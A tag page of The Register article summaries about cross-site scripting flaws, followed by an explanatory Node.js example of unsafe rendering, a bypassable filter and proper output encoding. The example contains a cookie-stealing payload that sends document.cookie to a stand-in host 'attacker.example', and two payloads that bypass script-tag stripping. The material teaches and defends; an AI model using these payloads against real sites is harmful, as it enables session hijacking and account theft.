Articles about xss

Researcher details nasty XSS flaw in popular web editor

A tool that's popular with Microsoft's in-house developers, the RadEditor HTML editor, contains a dangerous cross-site scripting (XSS) vulnerability, researcher GS McNamara says. The editor was developed by Telerik and used in trusted in-house code in many big enterprises and across Redmond products including MSDN, CodePlex, …
Darren Pauli, 1 Oct 2014

Who.is does the Harlem Shake

Websites across the internet are doing the Harlem Shake after online comedians began exploiting cross site scripting (XSS) flaws that make pages dance and speakers blare. The flaws lie in how sites display DNS TXT records – not in the DNS protocol itself – because the attacker-controlled record contents are rendered without sanitisation, which allowed internet scamps to turn boring websites like Who.is into …
Darren Pauli, 22 Sep 2014

Vid shows how to easily hack 'anti-spy' webmail (sorry, ProtonMail)

Video + Update A security researcher has demonstrated a classic JavaScript-injection attack against ProtonMail – the webmail system developed by boffins and CERN to withstand surveillance by the world's intelligence agencies. German security expert Thomas Roth published a video over the weekend showing how he exploited a trivial …
Iain Thomson, 7 Jul 2014

TweetDeck XSS flap: Miscreants flash their naughty bits at users

Updated Twitter aficionados are being warned to log out of Twitter client TweetDeck and revoke its access to their accounts after an apparent cross-site scripting vulnerability was discovered. Multiple users – including El Reg's HQ in London, England – reported on Wednesday that they had seen a suspicious pop-up within Tweetdeck that …
Jack Clark, 11 Jun 2014

Google launches hacker game to train bug 'mercenaries'

Google wants to bring new blood into the security bug hunter community with a game launched to test developers' knowledge of cross site scripting (XSS) vulnerabilities. The XSS Game puts devs through six levels of increasing complexity that require successful attacks against mock vulnerable web applications. "The game is …
Darren Pauli, 30 May 2014

Yahoo! Saves! Trolls! From! Session! Jacking! Holes!

Yahoo! has patched a cross site scripting (XSS) flaw in the commenting system it uses across many of its properties. The internet giant squished two attack vectors affecting a laundry list of Yahoo! services covering topics as diverse as shopping and sport two weeks after they were reported on May 2nd. Californian web dev and …
Darren Pauli, 20 May 2014

Innocent surfers drafted into ZOMBIE ARMY by sneaky XSS vuln

Visitors to a video distribution website were unwittingly turned into participants in a hacker's DDoS battle against a third-party site earlier this month. DDoS mitigation firm Incapsula identified the video website as Sohu.TV, after the Chinese streaming site plugged a vuln that enabled the browser-based botnet attack to …
John Leyden, 25 Apr 2014

ICO plugs XSS vuln in its website. Only took watchdog FIVE YEARS

The Information Commissioner's Office (ICO) has finally fixed a security bug on its website - five years after it was first notified to the data privacy watchdog. IT consultant Paul Moore first warned the ICO about a cross site scripting (XSS) problem on its website in 2009. The flaw meant it was possible to introduce …
John Leyden, 28 Mar 2014

RoR Paperclip infested by content type spoofing bug

Ruby on Rails developers using the Paperclip uploader to receive files need to update to a new version, after a developer turned up an XSS bug in the software that could possibly be extended to remote code execution. The new version implements stricter incoming file typing to eliminate the bug. What Egor Homakov …

Ubuntu puts forums back online, reveals autopsy of a brag hacker

Ubuntu Forums are back to normal following a serious hack attack that exposed the usernames, email addresses and hashed passwords of 1.8 million open source users. Parent firm Canonical restored the forums on Tuesday as well as publishing a detailed summary of what went wrong and the broad steps it has taken to beef up …
John Leyden, 2 Aug 2013

The Grauniad corrects an error on its website

The Guardian has fixed a minor cross-site scripting vulnerability on its website. The flaw, discovered and responsibly disclosed by security researcher Pete Houghton, occurred at the worst possible place on the UK broadsheet's website - right on its login page. Readers use the page to log in and comment on stories. In theory …
John Leyden, 19 Jul 2013

PayPal denies stiffing bug-hunting teen on bounty

PayPal has denied that it refused a teenage security researcher a reward for finding a potentially nasty bug on the basis that he was too young. The payments processing firm said that while it had denied the 17-year-old a reward, it was because another researcher had already reported the flaw. Robert Kugler, 17, found a cross- …
John Leyden, 30 May 2013

Filthy! old! blog! bug! blamed! for! Yahoo! webmail! hijacks!

Yahoo! webmail accounts are being hijacked by hackers exploiting an eight-month-old bug in the web giant's blog, security biz Bitdefender warns. Messages with a short link to an apparently harmless MSNBC web-page are being spread to compromise mailboxes: the link actually points to a completely different website hosting …
John Leyden, 1 Feb 2013

Yahoo! email! hijack! exploit!... Yours! for! $700!

A cross-site scripting (XSS) flaw on Yahoo! Mail creates a means to steal cookies and hijack accounts, according to a hacker who is offering to sell an alleged zero-day vulnerability exploit for $700. The cybercrook, who uses the online nickname TheHell, knocked up a video to market the exploit which he is attempting to sell …
John Leyden, 27 Nov 2012

eBay: It's safe to buy busted lava lamps and bug-infested rugs again

eBay has resolved a cross-site scripting bug on its website that independent experts warned posed a significant risk of fraud to users of the auction site. The XSS flaw meant that, once logged into a seller account on eBay, an attacker could insert XSS exploit code into a listing of an item for sale. The XSS security flaw …
John Leyden, 22 Nov 2012

Chick-lit star snubs Menshn.com password flaw alert

Updated A security researcher has warned of new vulnerabilities in Tory MP and former chick-lit queen Louise Mensch's three-month-old chatroom-cum-microblogging service. A "trivial" CSRF attack (cross-site request forgery) can change a Menshn.com user's password, according to developer Danny Moules. El Reg has seen proof-of-concept …
John Leyden, 5 Sep 2012

Security still slack in WA government agencies

While not as utterly hopeless as last year, IT security is still troublesome in Western Australia’s government agencies. In last year’s annual audit, the Auditor General strolled through fourteen agency networks in an undetected penetration test. This year, the auditor’s staff have looked at payment security in nine agencies, …

'Self-aware' bank account robbing code unleashed by hacker

A hacker has published code for potent cross-site scripting attacks that he claims go beyond the usual cookie stealing and phishing for users' private details. Cross-site scripting (XSS) flaws allow attackers to present content under their control in the context of a vulnerable yet trusted site, thus tricking marks into …
John Leyden, 16 Dec 2011
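As an added example that is not code from any of the sites or articles above, the following Node.js script shows the mechanism those stories share, using the Who.is case as the model: a page prints attacker-controlled data (here a DNS TXT record) in the context of a trusted site without encoding it, so the attacker's markup and script run with that site's cookies. It contrasts the vulnerable renderer with a tag-stripping "fix" that can be bypassed, and with output encoding at the point of use. The page template, the helper names, the TXT record value and the bypass payloads are all constructed for illustration.

```javascript
// Added example: the shape of the bug behind most of the XSS stories above.
// Nothing here is code from Who.is, Yahoo!, eBay or any other site named on the page.

// Constructed attacker-controlled TXT record: a plausible SPF prefix followed by a
// payload that closes the surrounding markup and exfiltrates the session cookie to
// a hypothetical attacker host.
const EVIL_TXT =
  'v=spf1 include:_spf.example.com ~all"><script>' +
  'new Image().src="https://attacker.example/?c="+encodeURIComponent(document.cookie)' +
  '</script>';

// Vulnerable renderer: untrusted data is interpolated straight into HTML, once as
// text and once inside a double-quoted attribute. Whatever markup the record
// contains becomes part of the page.
function renderWhoisVulnerable(domain, txt) {
  return `<h1>${domain}</h1>\n<p class="txt" title="${txt}">${txt}</p>`;
}

// A common but wrong fix: strip <script> blocks and hope nothing else is active.
function stripScriptTags(s) {
  return String(s).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

function renderWhoisFiltered(domain, txt) {
  return renderWhoisVulnerable(domain, stripScriptTags(txt));
}

// The right fix for this context: encode the five characters that carry meaning in
// HTML text and in double-quoted attribute values, at the moment of output.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderWhoisSafe(domain, txt) {
  const d = escapeHtml(domain);
  const t = escapeHtml(txt);
  return `<h1>${d}</h1>\n<p class="txt" title="${t}">${t}</p>`;
}

// Crude detector, used only to make the difference visible: does the output carry a
// script tag, an inline event handler or a javascript: URL? (Not a security control.)
function containsActiveHtml(html) {
  return /<script\b|<\/script>|\bon\w+\s*=|javascript:/i.test(html);
}

// Two constructed payloads that survive the tag-stripping "fix":
const BYPASSES = [
  '<img src=x onerror=alert(document.cookie)>',                // contains no <script> at all
  '<scr<script></script>ipt>alert(document.cookie)</script>',  // reassembles after one stripping pass
];

// Renders the same record three ways and reports whether active HTML came out.
function demo() {
  const results = {
    vulnerable: containsActiveHtml(renderWhoisVulnerable('who.is', EVIL_TXT)),
    filtered: BYPASSES.map((p) => containsActiveHtml(renderWhoisFiltered('who.is', p))),
    safe: containsActiveHtml(renderWhoisSafe('who.is', EVIL_TXT)),
  };
  console.log(results); // { vulnerable: true, filtered: [ true, true ], safe: false }
  return results;
}

demo();
```

The encoder above is only correct for HTML text and quoted attribute values; data that lands inside a script block, a URL or a CSS property needs the encoder for that context. The cookie-theft payload is the attack the Yahoo! Mail and TweetDeck stories describe; marking the session cookie HttpOnly and shipping a Content-Security-Policy limit the damage, but neither replaces encoding the output.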


Biting the hand that feeds IT © 1998–2018